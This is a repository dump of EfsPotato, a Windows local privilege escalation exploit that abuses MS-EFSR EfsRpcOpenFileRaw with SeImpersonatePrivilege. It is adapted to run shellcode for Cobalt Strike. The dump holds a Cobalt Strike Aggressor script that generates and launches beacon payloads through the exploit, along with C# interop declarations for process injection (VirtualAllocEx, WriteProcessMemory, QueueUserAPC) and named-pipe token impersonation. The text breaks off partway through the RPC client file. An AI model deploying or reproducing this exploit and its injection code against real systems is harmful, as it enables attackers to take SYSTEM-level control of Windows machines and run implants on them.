├── 3.png
├── README.md
├── EfsPotato
├── EfsPotato.cna
├── Properties
│ └── AssemblyInfo.cs
├── EfsPotato.sln
├── EfsPotato.csproj
├── APIDef.cs
├── EfsrTiny.cs
└── Program.cs
├── LICENSE
└── .gitignore
/3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0neAtSec/EfsPotato-1/HEAD/3.png
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # EfsPotato
2 | MS-EFSR EfsRpcOpenFileRaw with SeImpersonatePrivilege local privilege escalation vulnerability
3 |
4 | 艹老师的原版:https://github.com/zcgonvh/EfsPotato
5 |
6 | 我改成了执行shellcode,方便cs使用的版本。
7 |
8 | 
9 |
--------------------------------------------------------------------------------
/EfsPotato/EfsPotato.cna:
--------------------------------------------------------------------------------
1 | # EfsPotato built as C# exe
2 | #
3 | # Author: L.N.
4 | # GitHub: https://github.com/AttackTeamFamily/EfsPotato
5 | #
6 |
# Exploit callback wired up by beacon_exploit_register below. Aggressor hands
# it $1 = beacon id (used by btask/-is64/bexecute_assembly) and $2 = the
# listener chosen in the dialog (used by listener_describe/artifact_payload).
sub EfsPotato {
    local('$shellcode $arch $exe');

    # acknowledge this command; "T1068" is the ATT&CK technique id
    # (Exploitation for Privilege Escalation) attached to the task log entry
    btask($1, "Task Beacon to run " . listener_describe($2) . " via EfsPotato", "T1068");

    # tune our parameters based on the target arch
    if (-is64 $1)
    {
        $arch = "x64";
    } else {
        $arch = "x86";
    }

    # the compiled assembly is resolved relative to this script's own location
    $exe = script_resource("EfsPotato.exe");

    # generate our shellcode && use stageless
    # (raw payload for $arch, base64-encoded so it can travel as one string argument)
    $shellcode = base64_encode(artifact_payload($2, "raw", $arch));

    # spawn a Beacon post-ex job with bexecute_assembly
    # the base64 string is the assembly's single command-line argument
    bexecute_assembly!($1, $exe, $shellcode);

    # link to our payload if it's a TCP or SMB Beacon
    beacon_link($1, $null, $2);
}
beacon_exploit_register("EfsPotato", "MS-EFSR EfsRpcOpenFileRaw with SeImpersonatePrivilege local privalege escalation vulnerability", &EfsPotato);
33 |
--------------------------------------------------------------------------------
/EfsPotato/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
// General information about an assembly is controlled through the following
// set of attributes. Change these attribute values to modify the information
// associated with an assembly.
[assembly: AssemblyTitle("EfsPotato")]
[assembly: AssemblyDescription("")]
[assembly: AssemblyConfiguration("")]
[assembly: AssemblyCompany("")]
[assembly: AssemblyProduct("EfsPotato")]
[assembly: AssemblyCopyright("Copyright © 2021")]
[assembly: AssemblyTrademark("")]
[assembly: AssemblyCulture("")]

// Setting ComVisible to false makes the types in this assembly not visible
// to COM components. If you need to access a type in this assembly from
// COM, set the ComVisible attribute to true on that type.
[assembly: ComVisible(false)]

// The following GUID is for the ID of the typelib if this project is exposed to COM
[assembly: Guid("5243ab4d-12e2-4059-a529-2b007ec26320")]

// Version information for an assembly consists of the following four values:
//
//      Major Version
//      Minor Version
//      Build Number
//      Revision
//
// You can specify all the values or you can default the Build and Revision
// Numbers by using the '*' as shown below:
// [assembly: AssemblyVersion("1.0.*")]
[assembly: AssemblyVersion("1.0.0.0")]
[assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
1 | MIT License
2 |
3 | Copyright (c) 2021 公鸡队之家
4 |
5 | Permission is hereby granted, free of charge, to any person obtaining a copy
6 | of this software and associated documentation files (the "Software"), to deal
7 | in the Software without restriction, including without limitation the rights
8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
9 | copies of the Software, and to permit persons to whom the Software is
10 | furnished to do so, subject to the following conditions:
11 |
12 | The above copyright notice and this permission notice shall be included in all
13 | copies or substantial portions of the Software.
14 |
15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
21 | SOFTWARE.
22 |
--------------------------------------------------------------------------------
/EfsPotato/EfsPotato.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio Version 16
4 | VisualStudioVersion = 16.0.30309.148
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "EfsPotato", "EfsPotato.csproj", "{5243AB4D-12E2-4059-A529-2B007EC26320}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|Any CPU = Debug|Any CPU
11 | Release|Any CPU = Release|Any CPU
12 | EndGlobalSection
13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
14 | {5243AB4D-12E2-4059-A529-2B007EC26320}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
15 | {5243AB4D-12E2-4059-A529-2B007EC26320}.Debug|Any CPU.Build.0 = Debug|Any CPU
16 | {5243AB4D-12E2-4059-A529-2B007EC26320}.Release|Any CPU.ActiveCfg = Release|Any CPU
17 | {5243AB4D-12E2-4059-A529-2B007EC26320}.Release|Any CPU.Build.0 = Release|Any CPU
18 | EndGlobalSection
19 | GlobalSection(SolutionProperties) = preSolution
20 | HideSolutionNode = FALSE
21 | EndGlobalSection
22 | GlobalSection(ExtensibilityGlobals) = postSolution
23 | SolutionGuid = {729EA5CF-BE7D-41A9-8DEB-17FE3A7FBB6F}
24 | EndGlobalSection
25 | EndGlobal
26 |
--------------------------------------------------------------------------------
/EfsPotato/EfsPotato.csproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | AnyCPU
7 | {5243AB4D-12E2-4059-A529-2B007EC26320}
8 | Exe
9 | EfsPotato
10 | EfsPotato
11 | v3.5
12 | 512
13 | true
14 |
15 |
16 | AnyCPU
17 | true
18 | full
19 | false
20 | bin\Debug\
21 | DEBUG;TRACE
22 | prompt
23 | 4
24 |
25 |
26 | AnyCPU
27 | pdbonly
28 | true
29 | bin\Release\
30 | TRACE
31 | prompt
32 | 4
33 |
34 |
35 |
36 |
37 |
38 |
39 |
40 |
41 |
42 |
43 |
44 |
45 |
46 |
47 |
48 |
49 |
50 |
51 |
52 |
--------------------------------------------------------------------------------
/.gitignore:
--------------------------------------------------------------------------------
1 | ## Ignore Visual Studio temporary files, build results, and
2 | ## files generated by popular Visual Studio add-ons.
3 | ##
4 | ## Get latest from https://github.com/github/gitignore/blob/master/VisualStudio.gitignore
5 |
6 | # User-specific files
7 | *.rsuser
8 | *.suo
9 | *.user
10 | *.userosscache
11 | *.sln.docstates
12 |
13 | # User-specific files (MonoDevelop/Xamarin Studio)
14 | *.userprefs
15 |
16 | # Mono auto generated files
17 | mono_crash.*
18 |
19 | # Build results
20 | [Dd]ebug/
21 | [Dd]ebugPublic/
22 | [Rr]elease/
23 | [Rr]eleases/
24 | x64/
25 | x86/
26 | [Aa][Rr][Mm]/
27 | [Aa][Rr][Mm]64/
28 | bld/
29 | [Bb]in/
30 | [Oo]bj/
31 | [Ll]og/
32 | [Ll]ogs/
33 |
34 | # Visual Studio 2015/2017 cache/options directory
35 | .vs/
36 | # Uncomment if you have tasks that create the project's static files in wwwroot
37 | #wwwroot/
38 |
39 | # Visual Studio 2017 auto generated files
40 | Generated\ Files/
41 |
42 | # MSTest test Results
43 | [Tt]est[Rr]esult*/
44 | [Bb]uild[Ll]og.*
45 |
46 | # NUnit
47 | *.VisualState.xml
48 | TestResult.xml
49 | nunit-*.xml
50 |
51 | # Build Results of an ATL Project
52 | [Dd]ebugPS/
53 | [Rr]eleasePS/
54 | dlldata.c
55 |
56 | # Benchmark Results
57 | BenchmarkDotNet.Artifacts/
58 |
59 | # .NET Core
60 | project.lock.json
61 | project.fragment.lock.json
62 | artifacts/
63 |
64 | # StyleCop
65 | StyleCopReport.xml
66 |
67 | # Files built by Visual Studio
68 | *_i.c
69 | *_p.c
70 | *_h.h
71 | *.ilk
72 | *.meta
73 | *.obj
74 | *.iobj
75 | *.pch
76 | *.pdb
77 | *.ipdb
78 | *.pgc
79 | *.pgd
80 | *.rsp
81 | *.sbr
82 | *.tlb
83 | *.tli
84 | *.tlh
85 | *.tmp
86 | *.tmp_proj
87 | *_wpftmp.csproj
88 | *.log
89 | *.vspscc
90 | *.vssscc
91 | .builds
92 | *.pidb
93 | *.svclog
94 | *.scc
95 |
96 | # Chutzpah Test files
97 | _Chutzpah*
98 |
99 | # Visual C++ cache files
100 | ipch/
101 | *.aps
102 | *.ncb
103 | *.opendb
104 | *.opensdf
105 | *.sdf
106 | *.cachefile
107 | *.VC.db
108 | *.VC.VC.opendb
109 |
110 | # Visual Studio profiler
111 | *.psess
112 | *.vsp
113 | *.vspx
114 | *.sap
115 |
116 | # Visual Studio Trace Files
117 | *.e2e
118 |
119 | # TFS 2012 Local Workspace
120 | $tf/
121 |
122 | # Guidance Automation Toolkit
123 | *.gpState
124 |
125 | # ReSharper is a .NET coding add-in
126 | _ReSharper*/
127 | *.[Rr]e[Ss]harper
128 | *.DotSettings.user
129 |
130 | # TeamCity is a build add-in
131 | _TeamCity*
132 |
133 | # DotCover is a Code Coverage Tool
134 | *.dotCover
135 |
136 | # AxoCover is a Code Coverage Tool
137 | .axoCover/*
138 | !.axoCover/settings.json
139 |
140 | # Visual Studio code coverage results
141 | *.coverage
142 | *.coveragexml
143 |
144 | # NCrunch
145 | _NCrunch_*
146 | .*crunch*.local.xml
147 | nCrunchTemp_*
148 |
149 | # MightyMoose
150 | *.mm.*
151 | AutoTest.Net/
152 |
153 | # Web workbench (sass)
154 | .sass-cache/
155 |
156 | # Installshield output folder
157 | [Ee]xpress/
158 |
159 | # DocProject is a documentation generator add-in
160 | DocProject/buildhelp/
161 | DocProject/Help/*.HxT
162 | DocProject/Help/*.HxC
163 | DocProject/Help/*.hhc
164 | DocProject/Help/*.hhk
165 | DocProject/Help/*.hhp
166 | DocProject/Help/Html2
167 | DocProject/Help/html
168 |
169 | # Click-Once directory
170 | publish/
171 |
172 | # Publish Web Output
173 | *.[Pp]ublish.xml
174 | *.azurePubxml
175 | # Note: Comment the next line if you want to checkin your web deploy settings,
176 | # but database connection strings (with potential passwords) will be unencrypted
177 | *.pubxml
178 | *.publishproj
179 |
180 | # Microsoft Azure Web App publish settings. Comment the next line if you want to
181 | # checkin your Azure Web App publish settings, but sensitive information contained
182 | # in these scripts will be unencrypted
183 | PublishScripts/
184 |
185 | # NuGet Packages
186 | *.nupkg
187 | # NuGet Symbol Packages
188 | *.snupkg
189 | # The packages folder can be ignored because of Package Restore
190 | **/[Pp]ackages/*
191 | # except build/, which is used as an MSBuild target.
192 | !**/[Pp]ackages/build/
193 | # Uncomment if necessary however generally it will be regenerated when needed
194 | #!**/[Pp]ackages/repositories.config
195 | # NuGet v3's project.json files produces more ignorable files
196 | *.nuget.props
197 | *.nuget.targets
198 |
199 | # Microsoft Azure Build Output
200 | csx/
201 | *.build.csdef
202 |
203 | # Microsoft Azure Emulator
204 | ecf/
205 | rcf/
206 |
207 | # Windows Store app package directories and files
208 | AppPackages/
209 | BundleArtifacts/
210 | Package.StoreAssociation.xml
211 | _pkginfo.txt
212 | *.appx
213 | *.appxbundle
214 | *.appxupload
215 |
216 | # Visual Studio cache files
217 | # files ending in .cache can be ignored
218 | *.[Cc]ache
219 | # but keep track of directories ending in .cache
220 | !?*.[Cc]ache/
221 |
222 | # Others
223 | ClientBin/
224 | ~$*
225 | *~
226 | *.dbmdl
227 | *.dbproj.schemaview
228 | *.jfm
229 | *.pfx
230 | *.publishsettings
231 | orleans.codegen.cs
232 |
233 | # Including strong name files can present a security risk
234 | # (https://github.com/github/gitignore/pull/2483#issue-259490424)
235 | #*.snk
236 |
237 | # Since there are multiple workflows, uncomment next line to ignore bower_components
238 | # (https://github.com/github/gitignore/pull/1529#issuecomment-104372622)
239 | #bower_components/
240 |
241 | # RIA/Silverlight projects
242 | Generated_Code/
243 |
244 | # Backup & report files from converting an old project file
245 | # to a newer Visual Studio version. Backup files are not needed,
246 | # because we have git ;-)
247 | _UpgradeReport_Files/
248 | Backup*/
249 | UpgradeLog*.XML
250 | UpgradeLog*.htm
251 | ServiceFabricBackup/
252 | *.rptproj.bak
253 |
254 | # SQL Server files
255 | *.mdf
256 | *.ldf
257 | *.ndf
258 |
259 | # Business Intelligence projects
260 | *.rdl.data
261 | *.bim.layout
262 | *.bim_*.settings
263 | *.rptproj.rsuser
264 | *- [Bb]ackup.rdl
265 | *- [Bb]ackup ([0-9]).rdl
266 | *- [Bb]ackup ([0-9][0-9]).rdl
267 |
268 | # Microsoft Fakes
269 | FakesAssemblies/
270 |
271 | # GhostDoc plugin setting file
272 | *.GhostDoc.xml
273 |
274 | # Node.js Tools for Visual Studio
275 | .ntvs_analysis.dat
276 | node_modules/
277 |
278 | # Visual Studio 6 build log
279 | *.plg
280 |
281 | # Visual Studio 6 workspace options file
282 | *.opt
283 |
284 | # Visual Studio 6 auto-generated workspace file (contains which files were open etc.)
285 | *.vbw
286 |
287 | # Visual Studio LightSwitch build output
288 | **/*.HTMLClient/GeneratedArtifacts
289 | **/*.DesktopClient/GeneratedArtifacts
290 | **/*.DesktopClient/ModelManifest.xml
291 | **/*.Server/GeneratedArtifacts
292 | **/*.Server/ModelManifest.xml
293 | _Pvt_Extensions
294 |
295 | # Paket dependency manager
296 | .paket/paket.exe
297 | paket-files/
298 |
299 | # FAKE - F# Make
300 | .fake/
301 |
302 | # CodeRush personal settings
303 | .cr/personal
304 |
305 | # Python Tools for Visual Studio (PTVS)
306 | __pycache__/
307 | *.pyc
308 |
309 | # Cake - Uncomment if you are using it
310 | # tools/**
311 | # !tools/packages.config
312 |
313 | # Tabs Studio
314 | *.tss
315 |
316 | # Telerik's JustMock configuration file
317 | *.jmconfig
318 |
319 | # BizTalk build output
320 | *.btp.cs
321 | *.btm.cs
322 | *.odx.cs
323 | *.xsd.cs
324 |
325 | # OpenCover UI analysis results
326 | OpenCover/
327 |
328 | # Azure Stream Analytics local run output
329 | ASALocalRun/
330 |
331 | # MSBuild Binary and Structured Log
332 | *.binlog
333 |
334 | # NVidia Nsight GPU debugger configuration file
335 | *.nvuser
336 |
337 | # MFractors (Xamarin productivity tool) working folder
338 | .mfractor/
339 |
340 | # Local History for Visual Studio
341 | .localhistory/
342 |
343 | # BeatPulse healthcheck temp database
344 | healthchecksdb
345 |
346 | # Backup folder for Package Reference Convert tool in Visual Studio 2017
347 | MigrationBackup/
348 |
349 | # Ionide (cross platform F# VS Code tools) working folder
350 | .ionide/
351 |
--------------------------------------------------------------------------------
/EfsPotato/APIDef.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Runtime.InteropServices;
3 |
4 | namespace EfsPotato
5 | {
class APIDef
{
    // Win32 interop surface shared by the project. The declarations were
    // copied from public P/Invoke references (see the author's note in the
    // "pinvoke" region) and keep their original parameter names and integer
    // widths, not all of which match the native prototypes; the NOTE(review)
    // comments below mark the ones worth checking before reuse.

    #region shellcode inject
    // Allocation-type and page-protection values passed as flAllocationType /
    // flProtect (or flNewProtect) to VirtualAlloc, VirtualAllocEx and
    // VirtualProtectEx below. Declared as writable public statics, so any
    // caller can overwrite them; nothing here guards against that.
    public static UInt32 MEM_COMMIT = 0x1000;
    public static UInt32 PAGE_EXECUTE_READWRITE = 0x40;
    public static UInt32 PAGE_READWRITE = 0x04;
    public static UInt32 PAGE_EXECUTE_READ = 0x20;

    // Access mask accepted by OpenProcess (processAccess parameter).
    [Flags]
    public enum ProcessAccessFlags : uint
    {
        All = 0x001F0FFF,
        Terminate = 0x00000001,
        CreateThread = 0x00000002,
        VirtualMemoryOperation = 0x00000008,
        VirtualMemoryRead = 0x00000010,
        VirtualMemoryWrite = 0x00000020,
        DuplicateHandle = 0x00000040,
        CreateProcess = 0x000000080,
        SetQuota = 0x00000100,
        SetInformation = 0x00000200,
        QueryInformation = 0x00000400,
        QueryLimitedInformation = 0x00001000,
        Synchronize = 0x00100000
    }

    // Creation flags accepted by CreateProcess (dwCreationFlags parameter).
    // NOTE(review): CREATE_SEPARATE_WOW_VDM and CREATE_SHARED_WOW_VDM both
    // carry 0x00001000 here; in winbase.h CREATE_SEPARATE_WOW_VDM is
    // 0x00000800, so the two members are indistinguishable in this enum.
    [Flags]
    public enum ProcessCreationFlags : uint
    {
        ZERO_FLAG = 0x00000000,
        CREATE_BREAKAWAY_FROM_JOB = 0x01000000,
        CREATE_DEFAULT_ERROR_MODE = 0x04000000,
        CREATE_NEW_CONSOLE = 0x00000010,
        CREATE_NEW_PROCESS_GROUP = 0x00000200,
        CREATE_NO_WINDOW = 0x08000000,
        CREATE_PROTECTED_PROCESS = 0x00040000,
        CREATE_PRESERVE_CODE_AUTHZ_LEVEL = 0x02000000,
        CREATE_SEPARATE_WOW_VDM = 0x00001000,
        CREATE_SHARED_WOW_VDM = 0x00001000,
        CREATE_SUSPENDED = 0x00000004,
        CREATE_UNICODE_ENVIRONMENT = 0x00000400,
        DEBUG_ONLY_THIS_PROCESS = 0x00000002,
        DEBUG_PROCESS = 0x00000001,
        DETACHED_PROCESS = 0x00000008,
        EXTENDED_STARTUPINFO_PRESENT = 0x00080000,
        INHERIT_PARENT_AFFINITY = 0x00010000
    }
    // Earlier, commented-out copies of PROCESS_INFORMATION / STARTUPINFO; the
    // live definitions are in the "pinvoke" region below.
    /*
    public struct PROCESS_INFORMATION
    {
    public IntPtr hProcess;
    public IntPtr hThread;
    public uint dwProcessId;
    public uint dwThreadId;
    }
    public struct STARTUPINFO
    {
    public uint cb;
    public string lpReserved;
    public string lpDesktop;
    public string lpTitle;
    public uint dwX;
    public uint dwY;
    public uint dwXSize;
    public uint dwYSize;
    public uint dwXCountChars;
    public uint dwYCountChars;
    public uint dwFillAttribute;
    public uint dwFlags;
    public short wShowWindow;
    public short cbReserved2;
    public IntPtr lpReserved2;
    public IntPtr hStdInput;
    public IntPtr hStdOutput;
    public IntPtr hStdError;
    }
    */
    // Access mask accepted by OpenThread (dwDesiredAccess parameter). Backed
    // by int although the native ACCESS_MASK is a DWORD; the values listed
    // fit either way.
    [Flags]
    public enum ThreadAccess : int
    {
        TERMINATE = (0x0001),
        SUSPEND_RESUME = (0x0002),
        GET_CONTEXT = (0x0008),
        SET_CONTEXT = (0x0010),
        SET_INFORMATION = (0x0020),
        QUERY_INFORMATION = (0x0040),
        SET_THREAD_TOKEN = (0x0080),
        IMPERSONATE = (0x0100),
        DIRECT_IMPERSONATION = (0x0200)
    }

    /// <summary>
    /// kernel32!OpenThread. Returns a thread handle, or IntPtr.Zero on
    /// failure (see Marshal.GetLastWin32Error); a non-zero handle must be
    /// released with CloseHandle.
    /// </summary>
    [DllImport("kernel32.dll", SetLastError = true)]
    public static extern IntPtr OpenThread(ThreadAccess dwDesiredAccess, bool bInheritHandle,
        int dwThreadId);

    /// <summary>
    /// kernel32!WriteProcessMemory. nSize is the number of bytes of lpBuffer
    /// to copy; lpNumberOfBytesWritten receives the count actually written.
    /// </summary>
    [DllImport("kernel32.dll", SetLastError = true)]
    public static extern bool WriteProcessMemory(
        IntPtr hProcess,
        IntPtr lpBaseAddress,
        byte[] lpBuffer,
        int nSize,
        out IntPtr lpNumberOfBytesWritten);

    // kernel32!QueueUserAPC. Declared without SetLastError, so a zero return
    // cannot be diagnosed through Marshal.GetLastWin32Error.
    [DllImport("kernel32.dll")]
    public static extern IntPtr QueueUserAPC(IntPtr pfnAPC, IntPtr hThread, IntPtr dwData);

    // kernel32!VirtualAlloc.
    // NOTE(review): lpStartAddr is UInt32 here, while the native parameter is
    // a pointer (LPVOID); this declaration is only width-correct in a 32-bit
    // process. VirtualAllocEx below declares the same parameter as IntPtr.
    // No SetLastError, so failures are not diagnosable either.
    [DllImport("kernel32")]
    public static extern IntPtr VirtualAlloc(UInt32 lpStartAddr,
        Int32 size, UInt32 flAllocationType, UInt32 flProtect);
    // kernel32!VirtualAllocEx. Returns the base address, or IntPtr.Zero on failure.
    [DllImport("kernel32.dll", SetLastError = true)]
    public static extern IntPtr VirtualAllocEx(IntPtr hProcess, IntPtr lpAddress,
        Int32 dwSize, UInt32 flAllocationType, UInt32 flProtect);

    /// <summary>
    /// kernel32!OpenProcess. Returns a process handle, or IntPtr.Zero on
    /// failure; a non-zero handle must be released with CloseHandle.
    /// </summary>
    [DllImport("kernel32.dll", SetLastError = true)]
    public static extern IntPtr OpenProcess(
        ProcessAccessFlags processAccess,
        bool bInheritHandle,
        int processId
    );

    // kernel32!CreateProcess. Declared without CharSet, so the string
    // parameters marshal as ANSI (the DllImport default), and without
    // SetLastError. Both handles in lpProcessInformation must be closed by
    // the caller.
    [DllImport("kernel32.dll")]
    public static extern bool CreateProcess(string lpApplicationName, string lpCommandLine, IntPtr lpProcessAttributes, IntPtr lpThreadAttributes, bool bInheritHandles, ProcessCreationFlags dwCreationFlags, IntPtr lpEnvironment, string lpCurrentDirectory, ref STARTUPINFO lpStartupInfo, out PROCESS_INFORMATION lpProcessInformation);
    // kernel32!ResumeThread / SuspendThread. Both return the previous suspend
    // count, or (uint)-1 on failure; neither sets SetLastError here.
    [DllImport("kernel32.dll")]
    public static extern uint ResumeThread(IntPtr hThread);
    [DllImport("kernel32.dll")]
    public static extern uint SuspendThread(IntPtr hThread);
    // kernel32!VirtualProtectEx. lpflOldProtect receives the previous
    // protection of the first page in the range. No SetLastError.
    [DllImport("kernel32.dll")]
    public static extern bool VirtualProtectEx(IntPtr hProcess, IntPtr lpAddress,
        int dwSize, uint flNewProtect, out uint lpflOldProtect);
    #endregion

    #region pinvoke
    //just copy-paste from stackoverflow,pinvoke.net,etc
    // kernel32!CreateFileW. The shortened names map, in order, to
    // dwDesiredAccess, dwShareMode, lpSecurityAttributes,
    // dwCreationDisposition, dwFlagsAndAttributes, hTemplateFile. Returns
    // INVALID_HANDLE_VALUE (-1), not IntPtr.Zero, on failure.
    [DllImport("kernel32.dll", SetLastError = true, CharSet = CharSet.Unicode)]
    public static extern IntPtr CreateFile(string lpFileName, int access, int share, IntPtr sa, int cd, int flag, IntPtr zero);
    // kernel32!CreateNamedPipeW. i1..i6 map, in order, to dwOpenMode,
    // dwPipeMode, nMaxInstances, nOutBufferSize, nInBufferSize,
    // nDefaultTimeOut; "zero" is lpSecurityAttributes. Returns
    // INVALID_HANDLE_VALUE (-1) on failure.
    [DllImport("kernel32.dll", SetLastError = true, CharSet = CharSet.Unicode)]
    public static extern IntPtr CreateNamedPipe(string name, int i1, int i2, int i3, int i4, int i5, int i6, IntPtr zero);
    // kernel32!ConnectNamedPipe; "zero" is lpOverlapped.
    // NOTE(review): the native return type is BOOL, declared here as IntPtr,
    // so callers have to compare against IntPtr.Zero rather than test a bool.
    [DllImport("kernel32.dll", SetLastError = true, CharSet = CharSet.Unicode)]
    public static extern IntPtr ConnectNamedPipe(IntPtr pipe, IntPtr zero);
    // advapi32!ImpersonateNamedPipeClient: the calling thread impersonates
    // the security context of the client connected to the pipe until
    // RevertToSelf (not declared here) is called.
    [DllImport("advapi32.dll", SetLastError = true)]
    public static extern bool ImpersonateNamedPipeClient(IntPtr pipe);
    // kernel32!CloseHandle.
    [DllImport("kernel32.dll", CharSet = CharSet.Auto, ExactSpelling = true, SetLastError = true)]
    public static extern bool CloseHandle(IntPtr handle);

    // advapi32!AdjustTokenPrivileges. The native call can return TRUE and
    // still report ERROR_NOT_ALL_ASSIGNED through GetLastError, so a bool
    // check alone is insufficient; Program.cs also tests
    // Marshal.GetLastWin32Error() != 0.
    [DllImport("advapi32.dll", SetLastError = true)]
    public static extern bool AdjustTokenPrivileges(IntPtr TokenHandle, bool DisableAllPrivileges, ref TOKEN_PRIVILEGES NewState, int Bufferlength, IntPtr PreviousState, IntPtr ReturnLength);

    // kernel32!CreatePipe. Both returned handles must be closed by the caller.
    [DllImport("kernel32.dll", CharSet = CharSet.Auto, SetLastError = true)]
    public static extern bool CreatePipe(out IntPtr hReadPipe, out IntPtr hWritePipe, ref SECURITY_ATTRIBUTES lpPipeAttributes, int nSize);

    // advapi32!LookupPrivilegeValue. A null lpSystemName means the local
    // system (Program.cs passes null with "SeImpersonatePrivilege").
    [DllImport("advapi32.dll", SetLastError = true, CharSet = CharSet.Auto)]
    [return: MarshalAs(UnmanagedType.Bool)]
    public static extern bool LookupPrivilegeValue(string lpSystemName, string lpName, out LUID lpLuid);

    // TOKEN_PRIVILEGES with room for exactly one entry: SizeConst = 1 means
    // only Privileges[0] is marshaled, so PrivilegeCount must be 1.
    [StructLayout(LayoutKind.Sequential)]
    public struct TOKEN_PRIVILEGES
    {
        public uint PrivilegeCount;
        [MarshalAs(UnmanagedType.ByValArray, SizeConst = 1)]
        public LUID_AND_ATTRIBUTES[] Privileges;
    }

    // Attributes is the SE_PRIVILEGE_* mask; Program.cs sets it to 2
    // (SE_PRIVILEGE_ENABLED).
    [StructLayout(LayoutKind.Sequential)]
    public struct LUID_AND_ATTRIBUTES
    {
        public LUID Luid;
        public UInt32 Attributes;
    }
    [StructLayout(LayoutKind.Sequential)]
    public struct LUID
    {
        public uint LowPart;
        public int HighPart;
    }

    // advapi32!CreateProcessAsUserW. Unlike CreateProcess above this one is
    // Unicode, takes dwCreationFlags as a plain int and lpCurrentDirectory as
    // a raw pointer (IntPtr.Zero = inherit the caller's directory).
    [DllImport("advapi32", SetLastError = true, CharSet = CharSet.Unicode)]
    public static extern bool CreateProcessAsUser(IntPtr hToken, string lpApplicationName, string lpCommandLine, IntPtr lpProcessAttributes, IntPtr lpThreadAttributes, bool bInheritHandles, int dwCreationFlags, IntPtr lpEnvironment, IntPtr lpCurrentDirectory, ref STARTUPINFO lpStartupInfo, out PROCESS_INFORMATION lpProcessInformation);

    // Output of CreateProcess / CreateProcessAsUser; hProcess and hThread are
    // owned by the caller and must be closed with CloseHandle.
    [StructLayout(LayoutKind.Sequential)]
    public struct PROCESS_INFORMATION
    {
        public IntPtr hProcess;
        public IntPtr hThread;
        public int dwProcessId;
        public int dwThreadId;
    }
    // STARTUPINFOW. cb must be set to Marshal.SizeOf(typeof(STARTUPINFO))
    // before the struct is passed to CreateProcess / CreateProcessAsUser.
    [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
    public struct STARTUPINFO
    {
        public Int32 cb;
        public string lpReserved;
        public string lpDesktop;
        public string lpTitle;
        public Int32 dwX;
        public Int32 dwY;
        public Int32 dwXSize;
        public Int32 dwYSize;
        public Int32 dwXCountChars;
        public Int32 dwYCountChars;
        public Int32 dwFillAttribute;
        public Int32 dwFlags;
        public Int16 wShowWindow;
        public Int16 cbReserved2;
        public IntPtr lpReserved2;
        public IntPtr hStdInput;
        public IntPtr hStdOutput;
        public IntPtr hStdError;
    }
    // SECURITY_ATTRIBUTES. nLength should be Marshal.SizeOf of the struct;
    // bInheritHandle is a Win32 BOOL (0 or 1) rather than a C# bool.
    [StructLayout(LayoutKind.Sequential)]
    public struct SECURITY_ATTRIBUTES
    {
        public int nLength;
        public IntPtr pSecurityDescriptor;
        public int bInheritHandle;
    }
    #endregion
}
223 | }
224 |
--------------------------------------------------------------------------------
/EfsPotato/EfsrTiny.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Runtime.InteropServices;
3 |
4 |
5 | namespace EfsPotato
6 | {
7 | //this code just copy-paste from gist
8 | //orig class: rprn
9 | //some changed for MS-EFSR
class EfsrTiny
{
    // Minimal NDR client for one RPC method. Per the comments above the
    // class it was adapted from a gist written for another interface (rprn)
    // and trimmed to what EfsRpcOpenFileRaw needs.
    //
    // Rpcrt4 imports. NdrClientCall2 is a C-varargs entry point and is bound
    // twice because the two bitnesses are driven differently: the x86
    // declaration receives the address of a pinned IntPtr[] holding the
    // arguments (see CallNdrClientCall2x86), the x64 declaration takes the
    // method's arguments directly.
    [DllImport("Rpcrt4.dll", EntryPoint = "RpcBindingFromStringBindingW", CallingConvention = CallingConvention.StdCall, CharSet = CharSet.Unicode, SetLastError = false)]
    private static extern Int32 RpcBindingFromStringBinding(String bindingString, out IntPtr lpBinding);

    [DllImport("Rpcrt4.dll", EntryPoint = "NdrClientCall2", CallingConvention = CallingConvention.Cdecl, CharSet = CharSet.Unicode, SetLastError = false)]
    private static extern IntPtr NdrClientCall2x86(IntPtr pMIDL_STUB_DESC, IntPtr formatString, IntPtr args);

    // Releases an RPC binding handle. NOTE(review): Bind passes it the string
    // binding produced by RpcStringBindingCompose; the matching release call
    // for that string is RpcStringFreeW — confirm before relying on this.
    [DllImport("Rpcrt4.dll", EntryPoint = "RpcBindingFree", CallingConvention = CallingConvention.StdCall, CharSet = CharSet.Unicode, SetLastError = false)]
    private static extern Int32 RpcBindingFree(ref IntPtr lpString);

    [DllImport("Rpcrt4.dll", EntryPoint = "RpcStringBindingComposeW", CallingConvention = CallingConvention.StdCall, CharSet = CharSet.Unicode, SetLastError = false)]
    private static extern Int32 RpcStringBindingCompose(String ObjUuid, String ProtSeq, String NetworkAddr, String Endpoint, String Options, out IntPtr lpBindingString);

    [DllImport("Rpcrt4.dll", EntryPoint = "RpcBindingSetOption", CallingConvention = CallingConvention.StdCall, SetLastError = false)]
